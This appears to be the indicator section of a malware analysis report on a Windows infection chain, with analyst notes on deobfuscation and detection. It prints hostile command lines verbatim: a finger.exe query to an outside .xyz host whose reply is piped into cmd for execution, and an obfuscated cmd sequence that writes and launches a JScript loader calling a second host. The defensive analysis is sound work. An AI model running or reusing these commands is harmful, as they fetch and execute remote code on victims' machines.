Technical Information (observed process command lines, file path, and network/DNS indicators)
- '<SYSTEM32>\finger.exe' ok@uaou8g.xczvadf.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\FfV.js"
- %LOCALAPPDATA%\ffv.js
- 'ua####.xczvadf.xyz':79
- 'ec#####aejv.delicox.xyz':80
- 'ua####.xczvadf.xyz':79
- DNS ASK ua####.xczvadf.xyz
- DNS ASK ec#####aejv.delicox.xyz
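- '<SYSTEM32>\cmd.exe' /c finger ok@uaou8g.xczvadf.xyz |more +2 |cmd
  (Note: the reply to the finger query, which goes out on TCP port 79 as listed above, is piped through `more +2` to drop the leading header lines and then straight into cmd for execution. finger.exe spawned by cmd.exe and outbound port-79 traffic from a workstation are both uncommon, which makes them practical detection and egress-filtering points.)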
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt LMWE=.j&&SEt LOQNS=vIExSarIExS a =IExS 'scIExSriIExSptIExS:'; b =IExS 'hIExSTtPIExS:'; GIExSetIExSObjIExSecIExSt(IExSa+b+'&&sET FK65=ZTXZAZTXZAecnmsueaejv.delicox.xyzZTXZA?1ZTXZA')&...
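- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p ID3U6="%LOQNS:IExS=%%FK65:ZTXZA=/%" 0<nul 1>%LOCALAPPDATA%\FfV%LMWE%s"
  (Note: the `%VAR:token=%` substitutions remove the filler string IExS and turn ZTXZA into `/`. `set /p` with stdin from nul then writes the de-padded text to %LOCALAPPDATA%\FfV.js. Because the filler strings are arbitrary, detection is better keyed on the behaviour, i.e. cmd.exe redirecting `set /p` output into a script file that wscript.exe then runs, than on these literal tokens.)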
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\FfV%LMWE%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\FfV.js